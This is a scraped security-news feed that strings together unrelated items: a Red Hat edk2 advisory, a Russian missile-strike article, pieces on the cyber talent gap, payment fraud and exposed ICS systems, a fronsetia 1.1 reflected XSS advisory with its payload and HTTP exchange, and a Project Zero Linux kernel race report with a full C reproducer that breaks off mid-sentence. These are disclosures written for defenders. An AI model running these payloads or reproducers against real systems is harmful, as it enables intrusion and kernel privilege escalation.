Red Hat Security Advisory 2024-9946-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include an integer overflow vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_9946.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: edk2 security updateAdvisory ID:        RHSA-2024:9946-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:9946Issue date:         2024-11-25Revision:           03CVE Names:          CVE-2024-38796====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Integer overflows in PeCoffLoaderRelocateImage (CVE-2024-38796)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38796References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2315390

Red Hat Security Advisory 2024-9946-03

A list of topics we covered in the week of November 18 to November 24 of 2024

November 25, 2024 - Cybercriminals are spamming content platforms like Spotify and Amazon with cracks, keygens, and forex trading platforms. We explain why.

November 25, 2024 - Hacktivists have breached Andrew Tate's learning platform The Real World and obtained 794,000 usernames for current and former members, as well as 324,382 email addresses of former clients.

November 22, 2024 - Meta provided some insight into their fight against pig butchering scammers, who are often victims of organized crime themselves

November 20, 2024 - People are receiving disturbing emails that appear to imply something has happened to their friend or family member.

November 20, 2024 - Apple has released security updates that look especially important for Intel-based Macs because they are already being exploited in the wild.

 A week in security (November 18 &#8211; November 24) 

This is the first time Russia has used its so-called Oreshnik intermediate-range ballistic missile in combat. The launch also serves as a warning to the West.

Two days ago, Russian president Vladimir Putin announced a change in the country's policy for employing nuclear weapons in conflict. Then, on Thursday, Russia attacked the Ukrainian city of Dnipro with a new type of ballistic missile capable of one day delivering multiple nuclear warheads to distant targets with little warning.

Putin says his ballistic missile attack on Ukraine is a warning to the West.

These events are just part of what has been a week of escalation in the war between Russia and Ukraine. In recent days, Ukraine fired US-made ATACMS tactical ballistic missiles and UK-supplied Storm Shadow missiles at targets in Russian territory for the first time. This followed approval by President Joe Biden for Ukraine to use US-provided longer-range missiles against Russian targets. Previously, Ukraine was only permitted to use them on its own territory.

In a rare televised statement Thursday, Putin said he ordered Russia's military to strike Dnipro, home to Soviet-era rocket factories, using a ballistic missile named Oreshnik. This means “hazelnut tree” in Russian. The attack was the first use of the Oreshnik missile “under combat conditions,” Putin said.

Videos from Dnipro posted on social media show multiple projectiles exploding as they impact the ground at high speed. Local residents in Dnipro said the Oreshnik missile struck an industrial plant operated by PA Pivdenmash, formerly known as Yuzhmash. The PA Pivdenmash factory previously manufactured booster stages for the Soviet-era Zenit rocket and, most recently, first-stage tanks for the US-operated Antares rocket for Northrop Grumman.

**Threats From the Kremlin**

Sabrina Singh, the Pentagon's deputy press secretary, called the weapon used Thursday an “experimental intermediate-range ballistic missile” based on Russia's RS-26 Rubezh intercontinental ballistic missile model. While the strike before dawn Thursday used conventional munitions, the impact of multiple projectiles suggests the missile employed multiple reentry vehicles, or MIRVs, similar to the way Russia might use the missile in a nuclear attack.

Singh said the missile could be refitted with different types of conventional or nuclear warheads. She said Russia notified the US government of the planned attack “briefly” before it happened through nuclear risk-reduction channels.

Ukrainian government officials initially said the attack on Dnipro was by an ICBM rather than an intermediate-range weapon, or IRBM.

ICBMs typically follow long, arcing trajectories that take the missiles into space, above the discernible atmosphere, as they travel to faraway targets. An intermediate-range missile, classified as a weapon that can travel between 3,000 and 5,500 kilometers, could also reach space, although the exact altitude reached by the Oreshnik missile was unknown Thursday.

“An IRBM and an ICBM, they can have similar flight paths. They can have high trajectories,” Singh said. “They can carry large payloads, but the main difference lies in the range and the strategic purpose.”

The Oreshnik missile launched Tuesday apparently took off from Russia’s Kapustin Yar rocket base roughly 800 kilometers from Dnipro, well away from intense fighting.

This is the first time any IRBM has been used in combat. The Intermediate-Range Nuclear Forces Treaty, ratified by the United States and the Soviet Union in 1988, banned ground-launched IRBMs. The US pulled out of the treaty in 2019 under the first Trump administration, citing noncompliance from Russia. At the time, US officials noted that China, which was not a signatory to the treaty, possessed more than 1,000 IRBMs in its arsenal.

Putin said Western air defenses are not capable of destroying the Oreshnik missile in flight, although this claim can't be verified. He said Russia would provide warnings to Ukraine in advance of similar missile attacks in the future to allow civilians to escape danger zones.

The Oreshnik missiles strike their targets at speeds of up to Mach 10, or 2.5 to 3 kilometers per second, Putin said. “The existing air defense systems around the world, including those being developed by the US in Europe, are unable to intercept such missiles.”

**A Global War?**

In perhaps the most chilling part of his remarks, Putin said the conflict in Ukraine is “taking on global dimensions” and said Russia is entitled to use missiles against Western countries supplying weapons for Ukraine to use against Russian targets.

“In the event of escalation, we will respond decisively and in kind,” Putin said. “I advise the ruling elites of those countries planning to use their military forces against Russia to seriously consider this.”

The change in nuclear doctrine authorized by Putin earlier this week also lowers the threshold for Russia’s use of nuclear weapons to counter a conventional attack that threatens Russian “territorial integrity.”

This seems to have already happened. Ukraine launched an offensive into Russia’s Kursk region in August, taking control of more than 1,000 square kilometers of Russian land. Russian forces, assisted by North Korean troops, are staging a counteroffensive to try to retake the territory.

Singh called Russia’s invitation of North Korean troops “escalatory” and said Putin could “choose to end this war today.”

US officials say Russian forces are suffering some 1,200 deaths or injuries per day in the war. In September, The Wall Street Journal reported that US intelligence sources estimated that a million Ukrainians and Russians had been killed or wounded in the war.

The UN Human Rights Office most recently reported that 11,973 civilians have been killed, including 622 children, since the start of the full-scale Russian invasion in February 2022.

“We warned Russia back in 2022 not to do this, and they did it anyways, so there are consequences for that,” Singh said. “But we don't want to see this escalate into a wider regional conflict. We don't seek war with Russia.”

_This story originally appeared on_ _Ars Technica._

Russia’s Ballistic Missile Attack on Ukraine Is an Alarming First

While the need for cybersecurity talent still exists, the budget may not. Here's how to maximize security staff despite hiring freezes.

Source: imtmphoto via Alamy Stock Photo

Talk of the talent gap in cybersecurity continues, with ISACA, ISC2, and even the Biden administration releasing new publications addressing the problem. Indeed, the US alone has almost half a million open cybersecurity positions, and ISC2 estimates a shortfall of 4.8 million professionals needed to secure the world's computing resources.

However, all that the surveys and studies tell us is that the cybersecurity sector is inadequately staffed, not that companies are looking to hire or that there are no people to fill positions. What exists is a disconnect between companies and candidates over issues like pay and required certifications, as well as budgeting struggles within organizations.

The recent "ISC2 2024 Cybersecurity Workforce Study" quantifies the budget issue inside companies. "In 2024, 25% of respondents reported layoffs in their cybersecurity departments, a 3% rise from 2023, while 37% faced budget cuts, a 7% rise from 2023," the report states. That means fewer job openings and less money to fill those positions that are opened.

Among a sea of qualified candidates, job seekers are struggling to figure out how to stand out to recruiters and hiring managers.

"I do tons of networking," says Xavier Ashe, a job seeker with more than 30 years' experience targeting director-level and CISO roles. "That's allowed me to get a number of opportunities to interview, but the competition is tough. Everyone is looking, and there are a lot of great folks I'm competing against."

**Hiring Expectations Are Misaligned**

In a Dark Reading article on this year's "Service for America" cybersecurity push, Shane Fry, CTO of RunSafe Security, blamed the employment gap on large organizations' tendency to favor highly skilled cyber workers with college degrees.

"This can lead to some great candidates, but it also ostracizes a large group of folks that are so passionate about cyber that they picked up the skills on their own and don't have a degree to put on a resume," Fry wrote. "There's a ton of opportunities for businesses to provide on-the-job training and external training courses to get people from the fringes of cybersecurity into the cybersecurity fold."

CyberSeek, a joint project between tech certification organization CompTIA, labor market analyst Lightcast, and US federal cybersecurity program NICE, shows that external training might require better alignment between job seekers and hiring organizations. Its cybersecurity career heat map compares certifications held and certifications requested. Some certs, like CompTIA+ and Certified Information Systems Security Professional (CISSP), are overrepresented in the hiring pool, while others — such as Certified Information Systems Auditor (CISA) and Certified Information Security Manager (CISM) — do not have enough certification holders to meet employer demand.

CyberSeek illustrates a further misalignment in its Career Pathway graphic, which represents entry-level, mid-level, and advanced-level positions with circles proportionally sized to the number of job openings. All of the entry-level and all but one of the mid-level job types are tiny dots representing fewer than 7,000 jobs nationwide in the US; the big circles representing north of 24,000 job openings are out of reach of people making a career switch or just starting out.

Besides how the field tilts away from early-career job seekers, senior-level candidates are running into a different issue: disparity between what they expect to be paid for their experience level and what job listings offer. Budget cuts affect the hiring environment, even leading to layoffs, according to ISC2's study. "In 2023, the top causes for talent and skills gaps were an inability to find the talent or skills they needed to succeed," the ISC2 said. "But today, it's not about supply, it's about limited resources for hiring."

That matches Ashe's job-hunting experience. "The big companies are lowballing executive compensation," he says. "I turned down one offer this summer due to the pay cut I would have to take."

The ISC2 study found a 0.1% increase in global cybersecurity workers in 2024 over 2023. Compared to the 8.7% increase in 2023 over 2022, "This year's numbers suggest that hiring has slowed for 2023–2024," the study concludes.

**If You Can't Hire, Improve the Tech**

So if nobody is hiring entry-level people, and nobody can hire higher-level professionals because of salary requirements, how can an organization maintain its cybersecurity team? By keeping existing workers from jumping ship, says Steve Wilson, chief product officer at Exabeam.

One way to create a better working environment, Wilson says, is to make the workload less crushing by automating more. Machine learning algorithms analyze raw data as it flows through the network, continuously learning patterns of normal behavior and identifying anomalies. When a suspicious case emerges, traces of unusual activity are summarized and presented in natural language, making it easier for analysts to interpret the data without sifting through dense logs. This approach saves time and allows security professionals to focus their efforts where they matter most.

"It's about reaching the point where we can identify what's abnormal and worrisome, and then get that in front of a human analyst to take action," says Wilson. "That's where the real work starts and where the time saved becomes so valuable."

For the beginning analyst, these kinds of tools allow them to understand exactly what is suspicious about a flagged issue, in the process learning to understand the technical points, Wilson says. This gives Tier 1 analysts a chance to fix the problem themselves rather than escalate it to a Tier 3 analyst. By reducing escalations, the workload for Tier 3 analysts is eased, and they can use the LLM to search for obscure data points for tougher problems.

"It builds the skills for those younger ones because they can ask the dumb question without feeling like they're exposing themselves," Wilson says. "And then it frees up the time on those senior ones to actually go work the really tricky problems."

Notes Bryan Kissinger, CISO and senior VP at Trace3: "People get burned out when they're doing a job they don't like or their team around them is not supportive of work/life balance," he says. "The more repetitive and mundane activities ... a lot of that can be taken up by tools and automation."

**The Right People, If You Can Keep Them**

While poor salaries dropped as the reason cybersecurity talent left a job, from 54% in 2023 to 50% in 2024, work stress levels pushed 46% of staff to leave their cybersecurity jobs this year (up from 43% in 2023). That's according to the ISACA's "Global State of Cybersecurity 2024," which also cited lack of support from management (34%), poor work culture (32%), and return-to-office initiatives (32%) as reasons people quit.

Retention is key to Trace3, Kissinger adds. "Sometimes it's very challenging to tell when someone's burning out," he says. "\[An employee was\] ready to leave because they were burning out, and I said, 'This is the first I've heard about it. Can we bring on some contractors to help us moderate the workload?' Unless people speak up, you're really doing yourself a disservice."

Adds Wilson: "Sometimes these automation products, whether they're cybersecurity or marketing or whatever, there's a value proposition that says you can have less people on your staff. I don't think there's anybody saying, 'I'm spending too much on my SOC team — I'm going to reduce that by bringing in automation.' What they're saying is, 'My SOC team is overwhelmed, and people are quitting because they're burned out.'"

**About the Author**

Karen joined Dark Reading in January 2022 as features editor. She's been in tech editing since before the img tag was introduced, working for outlets such as the IEEE Computer Society, CNET Download.com, and TechTV. She lives in Los Angeles with her husband, son, and two cats. Find her on Mastodon.

What Talent Gap? Hiring Practices Are the Real Problem

Learn how to prevent payment fraud with effective fraud detection, online prevention solutions, and secure payment orchestration strategies.…

Learn how to prevent payment fraud with effective fraud detection, online prevention solutions, and secure payment orchestration strategies.

****The Basics of Fraud Prevention in Online Payments****

With the surge in e-commerce and digital payments, fraudulent transactions have become more sophisticated, costing businesses billions annually. For businesses, effective **fraud prevention tools** and solutions have become a necessity.

This article explores the essentials of payment fraud prevention, highlighting common threats, the role of payment orchestration platforms with advanced security measures, and best practices to safeguard transactions.

****Common Types of Payment Fraud****

Understanding the **types of fraudulent payments** is the first step in implementing an effective fraud prevention strategy. Here’s the list of the most common types of online payment fraud:

*   **Identity theft:** Fraudsters use stolen identities to make unauthorised purchases or access accounts.
*   **Phishing scams:** Cybercriminals trick users into revealing sensitive payment data and further misuse it.
*   **Card-not-present or CNP fraud**: This occurs during online transactions without the physical card, making verification more difficult.
*   **Chargeback fraud**: Fraudsters make purchases and later dispute the charges to reclaim the funds.

Each of these threats underscores the need for robust online fraud prevention solutions and payment fraud detection systems.

****Essential Security Features for Fraud Prevention****

Investing in advanced security measures is key to mitigating payment fraud risks. Online businesses often implement tokenisation and encryption to secure sensitive payment information by converting it into protected formats that are unusable to fraudsters.

Also, two-factor authentication adds an extra layer of security by requiring dual forms of identification, while AI-powered payment fraud analytics enhance fraud detection by analysing patterns to identify and block fraudulent transactions in real-time.

Traditionally, compliance with PCI DSS standards ensures adherence to the highest levels of payment data protection. Payment processing solutions, including **white-label ISO/MSP** platforms, often incorporate these features, enabling businesses to safeguard against fraudulent transactions effectively.

****Best Practices for Fraud Prevention****

Implementing a comprehensive **fraud prevention strategy** requires a mix of technology, policies, and education. The following list will help you understand the basics.

*   Adopt advanced fraud detection tools. **Utilise AI and machine learning** for real-time monitoring and alerts.
*   Regularly update security protocols. Cyber threats evolve rapidly, necessitating frequent updates to your systems.
*   Educate your team and customers. Training employees and informing customers about common fraud tactics helps mitigate risks.
*   Leverage payment orchestration. Streamlined payment routing with fraud checks reduces vulnerabilities.
*   Conduct payment fraud analytics. Regular analysis of transaction data can reveal patterns indicative of fraud.

By adopting these practices, businesses can better protect themselves against payment fraud while keeping transactions smooth and secure for everyone.

**Conclusion**

Payment fraud is a growing threat that demands businesses to invest in **anti-fraud strategies** and leverage advanced technologies like payment fraud detection and analytics to protect their revenue and reputation. Staying alert and regularly updating fraud prevention strategies is key to long-term success in the world of digital payments.

1.  Best Paid and Free OSINT Tools for 2024
2.  How ID Scanning Apps Can Prevent Fraud
3.  Leveraging AI for Enhanced Threat Detection – Prevention
4.  Imperative of Automating Fraud Detection in Financial Institutions
5.  Why Incident Response Plans Are Key to Cybersecurity Resilience

Fraud Prevention in Online Payments: A Practical Guide

73% of globally exposed ICS systems are in the US and Europe, with the US leading at 38%.…

73% of globally exposed ICS systems are in the US and Europe, with the US leading at 38%. Vulnerabilities in outdated protocols and exposed HMIs put critical infrastructure at severe risk, says Censys.

The Internet has revolutionized numerous industries, including manufacturing, energy, and water treatment. However, as more and more **industrial control systems** (ICS) are connected to the internet, they become increasingly vulnerable to cyberattacks. 

According to Censys’ annual State of the Internet Report, shared with Hackread.com, internet-exposed human-machine interfaces (HMIs) are the emerging new threat in ICS security. For your information, HMIs are the graphical interfaces used to monitor and control industrial systems.

The screenshot displays the HMI for a three-pump system, featuring options to monitor alarms, manage controls, and adjust system setpoints (Image credit: Censys).

Researchers at Censys, a leading internet intelligence company, observed that HMIs have become increasingly connected to the internet to enable remote access and management. This connectivity has opened the door to cyberattacks. This is concerning as in 2023 and 2024, we witnessed a series of attacks targeting internet-exposed HMIs, demonstrating the potential for significant disruption and damage.

One notable attack was carried out by the CyberAv3ngers, an Iranian hacking group, **who targeted** a water treatment facility in Pennsylvania, exploited a vulnerable HMI to gain control of the system and defaced it with an anti-Israel message. Another significant attack was from the Cyber Army of Russia Reborn, which **attacked** water facilities in Texas, manipulating HMIs to cause water storage tanks to overflow.

Censys’ report reveals that there are over 145,000 exposed ICS services worldwide, and over 40,000 Internet-connected ICS located in the United States with over half of them linked to building control and automation protocols.

“38% of these services are in North America, 35% are in Europe, and 22% are in Asia. The U.S. alone is responsible for over one-third of global ICS service exposures,” Censys’ **report** read.

The study also found that 18,000 exposed devices were more likely to control industrial systems. In the UK, approximately 1,500 control systems exposed on the public Internet were identified through scans of 18 automation protocols. Over 80% of these administration interfaces are for building controls.

Additionally, over 50% of hosts running low-level automation protocols are concentrated in ISPs, while over 80% of hosts running exposed HMIs are found in wireless networks like Verizon and AT&T. Moreover, about half of the HMIs associated with Water and Wastewater could be manipulated without authentication.

These exposed systems become a tempting target for cybercriminals and nation-state actors who could potentially disrupt critical infrastructure.

Researchers have also observed a high prevalence of outdated and insecure protocols. Many of these protocols, such as Modbus, S7, and IEC 60870-5-104, are decades old and lack advanced security features. Researchers discovered nearly 200 hosts running HMIs that were also running products from vendors explicitly prohibited by the US’s National Defense Authorization Act (NDAA) Section 889. 

The report highlights the need for operators to be mindful of what products and software they allow to run alongside industrial processes. Researchers recommend that security teams must examine the exposure of these protocols and HMIs, which for a vital component of the security of industrial control systems.

1.  **Malware can fully compromise building control systems**
2.  **Flaws can let hackers physically damage moving bridges**
3.  **Flaws in US Drinking Water Systems Put 26 Million at Risk**
4.  **Propump and Controls’ Osprey Pump Controller vulnerable**
5.  **Ransomware targeted SCADA systems of 3 US water facilities**

US and Europe Account for 73% of Global Exposed ICS Systems

fronsetia version 1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Reflected XSS - fronsetiav1.1# Date: 11/2024# Exploit Author: Andrey Stoykov# Version: 1.1# Tested on: Debian 12# Blog:https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.htmlReflected XSS #1 - "show_operations.jsp"Steps to Reproduce:1. Visit main page of the application.2. In the input field of "WSDL Location" enter the following payload "><imgsrc=x onerror=alert(1)>// HTTP GET RequestGET/fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3EHTTP/1.1Host: 192.168.78.128:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0)Gecko/20100101 Firefox/133.0[...]// HTTP ResponseHTTP/1.1 200Content-Type: text/html;charset=ISO-8859-1Content-Length: 6360Date: Wed, 20 Nov 2024 19:42:15 GMTKeep-Alive: timeout=20Connection: keep-alive[...]<title> Fronsetia: "><img src=x onerror=alert(1)> </title>[...]

fronsetia 1.1 Cross Site Scripting

A security-relevant race between mremap() and THP code has been discovered. Reaching the buggy code typically requires the ability to create unprivileged namespaces. The bug leads to installing physical address 0 as a page table, which is likely exploitable in several ways: For example, triggering the bug in multiple processes can probably lead to unintended page table sharing, which probably can lead to stale TLB entries pointing to freed pages.

    SummaryI found a security-relevant race between mremap() and THP code. Reaching the buggy code typically requires the ability to create unprivileged namespaces. The bug leads to installing physical address 0 as a page table, which is likely exploitable in several ways: For example, triggering the bug in multiple processes can probably lead to unintended page table sharing, which probably can lead to stale TLB entries pointing to freed pages.I also found two other (untested) theoretical races, but those arguably might not even count as bugs, and I'm pretty sure they're not security bugs. I am including my analysis of the closely related non-issues 2 and 3 as context in case you're curious, but I think they're stuff we can deal with on the public list later (or maybe even just leave as-is). Feel free to ignore that part of this report.I will send a suggested patch for the security bug, but I think it's unclear if my patch is actually the right way to fix it.This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-12-31.For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.htmlSecurity bug: move_normal_pmd vs MADVISE_COLLAPSEDescriptionIn mremap(), move_page_tables() looks at the type of the PMD entry and the specified address range to figure out by which method the next chunk of page table entries should be moved. At that point, the mmap_lock is held in write mode, but no rmap locks are held. For PMD entries that point to page tables and are fully covered by the source address range, move_pgt_entry(NORMAL_PMD, ...) is called, which first takes rmap locks, then does move_normal_pmd().move_normal_pmd() takes the necessary page table locks at source and destination, then moves an entire page table from the source to the destination:        /* Clear the pmd */        pmd = *old_pmd;        pmd_clear(old_pmd);        VM_BUG_ON(!pmd_none(*new_pmd));        pmd_populate(mm, new_pmd, pmd_pgtable(pmd));        flush_tlb_range(vma, old_addr, old_addr + PMD_SIZE);The problem is: The rmap locks, which protect against concurrent page table removal by retract_page_tables() in the THP code, are only taken after we have inspected the PMD entry to decide how to move it. So we can race as follows (with two processes that have mappings of the same tmpfs file that is stored on a tmpfs mount with huge=advise):process A                      process B=========                      =========mremap  mremap_to    move_vma      move_page_tables        get_old_pmd        alloc_new_pmd                      *** PREEMPT ***                               madvise(MADV_COLLAPSE)                                 do_madvise                                   madvise_walk_vmas                                     madvise_vma_behavior                                       madvise_collapse                                         hpage_collapse_scan_file                                           collapse_file                                             retract_page_tables                                               i_mmap_lock_read(mapping)                                               pmdp_collapse_flush                                               i_mmap_unlock_read(mapping)        move_pgt_entry(NORMAL_PMD, ...)          take_rmap_locks          move_normal_pmd          drop_rmap_locksIn this case, while move_normal_pmd() expects to see a PMD entry pointing to a page table, the PMD entry has actually been cleared. So this line:pmd_populate(mm, new_pmd, pmd_pgtable(pmd));runs pmd_pgtable() on a cleared PMD entry. On typical implementations (including the X86 one), this simply masks off some bits of pmd and assumes that the remainder is a physical address - so pmd_pgtable(0) returns a pointer to the page for physical address 0. Then, pmd_populate() constructs a PMD entry that points to this physical address as a page table.So this ends up installing physical address 0 as a page table.Fixing itI guess there are two ways we could fix this:    Hold the rmap locks much more broadly in move_page_tables(). In particular, take them before inspecting the source pmd, and if we do a PMD-level move, keep them held throughout the entire move.    Add a bunch of extra recheck/retry logic.I think the first option is nicer in terms of code complexity. Moving the lock up requires a small bit of refactoring though, and the broader locking could conceivably degrade the performance of concurrent rmap access.I will send a suggested patch for the first option in a minute (and I have tested that with that patch, my reproducer no longer triggers); but we might want to do some more bikeshedding of whether this is the right way to patch it, and if yes, whether the patch is doing too little lock-dropping for performance or adds too much complexity with the lock-dropping...ReproducerI made a testcase that triggers this issue after a while and causes a splat when the kernel later tries to unmap this page table at physical address 0:#define _GNU_SOURCE#include <err.h>#include <sched.h>#include <stdio.h>#include <string.h>#include <fcntl.h>#include <signal.h>#include <stdlib.h>#include <unistd.h>#include <sys/syscall.h>#include <sys/stat.h>#include <sys/prctl.h>#include <sys/mount.h>#include <sys/mman.h>#include <sys/wait.h>#include <sys/ioctl.h>static void pin_to(int cpu) {  cpu_set_t cset;  CPU_ZERO(&cset);  CPU_SET(cpu, &cset);  if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))    err(1, "set affinity");}#ifndef MADV_COLLAPSE#define MADV_COLLAPSE 25#endif#define SYSCHK(x) ({          \  typeof(x) __res = (x);      \  if (__res == (typeof(x))-1) \    err(1, "SYSCHK(" #x ")"); \  __res;                      \})static void write_file(char *name, char *buf) {  int fd = SYSCHK(open(name, O_WRONLY));  if (write(fd, buf, strlen(buf)) != strlen(buf))    err(1, "write %s", name);  close(fd);}static void write_map(char *name, int outer_id) {  char buf[100];  sprintf(buf, "0 %d 1", outer_id);  write_file(name, buf);}int main(void) {  // set up new mount ns for tmpfs with THP  int outer_uid = getuid();  int outer_gid = getgid();  SYSCHK(unshare(CLONE_NEWNS|CLONE_NEWUSER));  SYSCHK(mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL));  write_file("/proc/self/setgroups", "deny");  write_map("/proc/self/uid_map", outer_uid);  write_map("/proc/self/gid_map", outer_gid);  // make tmpfs with THP  SYSCHK(mount("none", "/tmp", "tmpfs", MS_NOSUID|MS_NODEV, "huge=advise"));  pin_to(0);  while (1) {    int fd = SYSCHK(open("/tmp/a", O_RDWR|O_CREAT, 0600));    void *ptr = SYSCHK(mmap((void*)0x200000UL, 0x200000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, 0));    SYSCHK(ftruncate(fd, 0x1000));    *((volatile char *)ptr) = 'a';    SYSCHK(ftruncate(fd, 0x200000));    SYSCHK(madvise(ptr, 0x200000, MADV_HUGEPAGE));    close(fd);    SYSCHK(unlink("/tmp/a"));    int child = SYSCHK(fork());    if (child == 0) {      for (int i=0; i<512; i++)        ((volatile char *)ptr)[0x1000*i] = 'a';      struct sched_param param = { .sched_priority = 0 };      SYSCHK(sched_setscheduler(0, SCHED_IDLE, &param));      /* race (outer side, will be preempted) */      SYSCHK(mremap((void*)0x200000, 0x200000, 0x200000, MREMAP_MAYMOVE|MREMAP_FIXED, (void*)0x40000000));      return 0;    }    for (int i=0; i<512; i++)      ((volatile char *)ptr)[0x1000*i] = 'a';    usleep(10);    /* race (inner side, will preempt after timer and voluntary resched) */    int madv_res = madvise(ptr, 0x200000, MADV_COLLAPSE);    if (madv_res == -1)      fprintf(stderr, "_");    int wstatus;    SYSCHK(waitpid(child, &wstatus, 0));    SYSCHK(munmap(ptr, 0x200000));    fprintf(stderr, ".");  }}Usage:user@vm:~/collapse-vs-mremap$ gcc -o collapse-vs-mremap-2-noassist collapse-vs-mremap-2-noassist.cuser@vm:~/collapse-vs-mremap$ ./collapse-vs-mremap-2-noassist.................................................................................................................................Result on Linux 6.11 in a QEMU VM, where a bunch of non-zero data is left over in the first 0x1000 bytes of physical memory (note the pmd:00000067):[  120.427189] BUG: Bad page map in process collapse-vs-mre  pte:f000ff53f000ff53 pmd:00000067[  120.428763] addr:0000000040000000 vm_flags:200000fb anon_vma:0000000000000000 mapping:ffff888007dd70f8 index:0[  120.430526] file:a fault:shmem_fault mmap:shmem_mmap read_folio:0x0[  120.431706] CPU: 0 UID: 1000 PID: 1219 Comm: collapse-vs-mre Tainted: G        W          6.11.0 #493[  120.433591] Tainted: [W]=WARN[  120.434201] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014[  120.435849] Call Trace:[  120.436375]  <TASK>[  120.436843]  dump_stack_lvl+0x53/0x70[  120.437570]  print_bad_pte+0x4e6/0x8e0[...][  120.447625]  vm_normal_page+0x1c8/0x260[...][  120.450162]  unmap_page_range+0x914/0x3d10[...][  120.456954]  unmap_vmas+0x1cc/0x390[...][  120.461123]  exit_mmap+0x160/0x6c0[...][  120.465181]  mmput+0xa0/0x3a0[  120.465793]  do_exit+0x7cd/0x27f0[...][  120.472198]  do_group_exit+0xac/0x230[  120.472916]  __x64_sys_exit_group+0x3e/0x50[  120.473722]  x64_sys_call+0x17f3/0x1800[  120.474469]  do_syscall_64+0x4b/0x110[  120.475189]  entry_SYSCALL_64_after_hwframe+0x76/0x7e[...][  120.489560]  </TASK>On other machines where physical page 0 contains only zeroes, the error is different and the kernel complains about the mm's pagetable bytes counter being -4096 on process exit.ImpactReaching this bug requires that you can create shmem/file THP mappings - anonymous THP uses different code that doesn't zap stuff under rmap locks. File THP is gated on an experimental config flag (CONFIG_READ_ONLY_THP_FOR_FS), so on normal distro kernels you need shmem THP to hit this bug. (Some Android kernels set CONFIG_READ_ONLY_THP_FOR_FS=y, but those kernels are older than 6.6, so they're not affected.)As far as I know, getting shmem THP normally requires that you can mount your own tmpfs with the right mount flags, so on normal Linux systems you usually need the ability to create your own user+mount namespace (like my reproducer does).If you trigger this bug in two different processes, or in two different locations in the same process, you should get physical page 0 mapped in two different places. Assuming you know that a certain part of the page contains zeroes, you should be able to get page table entries installed through one of the mappings, and then access those page table entries through the other mapping of the same page table.At that point, I think several bad things can happen that could lead to privilege escalation, though I haven't tested that:    When a PTE is zapped through the page table's first mapping, TLB flushes will only be done for the first mapping, but there can be TLB entries created through the second mapping. So you could probably end up with stale TLB entries pointing to freed pages.    If VMA 1 and VMA 2 share a page table, and you install an anonymous page through VMA 1, and then use mremap() on VMA 2 to move that PTE to another location, and then munmap() VMA 1, you'll end up with an anonymous page that's only mapped into a VMA that is not associated with the page's anon_vma, which leads to kernel UAF. (See https://project-zero.issues.chromium.org/issues/42451486 and https://git.kernel.org/linus/2555283eb40d .)I think the exploitability of this bug depends on whether a struct page has been allocated for physical address 0 - but that seems to be the case at least on the two X86 systems I tested this on.Non-issue 2 (no impact): move_ptes vs MADVISE_COLLAPSEmove_ptes() locks the source and destination page tables as follows:        old_pte = pte_offset_map_lock(mm, old_pmd, old_addr, &old_ptl);        if (!old_pte)                return -EAGAIN;        new_pte = pte_offset_map_nolock(mm, new_pmd, new_addr, &new_ptl);        if (!new_pte) {                pte_unmap_unlock(old_pte, old_ptl);                return -EAGAIN;        }        if (new_ptl != old_ptl)                spin_lock_nested(new_ptl, SINGLE_DEPTH_NESTING);pte_offset_map_nolock() followed by manually taking the page table lock does not (unlike pte_offset_map_lock()) protect against concurrent removal of the page table via retract_page_tables(); and that can happen when need_rmap_locks is false. So I think that after this block, we can end up with new_pte pointing to a page table that has already been scheduled for RCU-delayed freeing. The good news is that (as far as I understand) this can only happen when all the PTEs in the source page table are pte_none(), so no PTEs will actually be written to the detached destination page table, so nothing bad happens.Non-issue 3 (probably no impact, untested): move_huge_pmd vs split_huge_page_to_list_to_orderThe classic way mremap() used to work is:    We make a new VMA.    We move page table entries into the new VMA with move_page_tables(), creating page tables if necessary. Only page table entries are moved; the old page tables stay where they are.    If a page table allocation fails due to OOM, or if the ->mremap handler returns an error, we use move_page_tables() to move the page table entries back to the old VMA; this is expected to always succeed, since the old page tables still exist, so page table allocation should not happen.As a comment in move_page_tables() explains:/* * On error, move entries back from new area to old, * which will succeed since page tables still there, * and then proceed to unmap new area instead of old. */However, that does not hold in the following scenario, assuming that the architecture does not define HAVE_MOVE_PMD (which permits mremap() to move entire page tables):    move_vma() calls move_page_tables()    move_page_tables() moves an anonymous huge PMD entry.    move_page_tables() tries to move more page table entries, but page table allocation fails, and the function returns early.    Another racing process causes the huge PMD entry to be split via split_huge_page_to_list_to_order() (turning the huge PMD entry into a PMD entry pointing to a page table whose PTEs point to all the subpages).    move_vma() calls 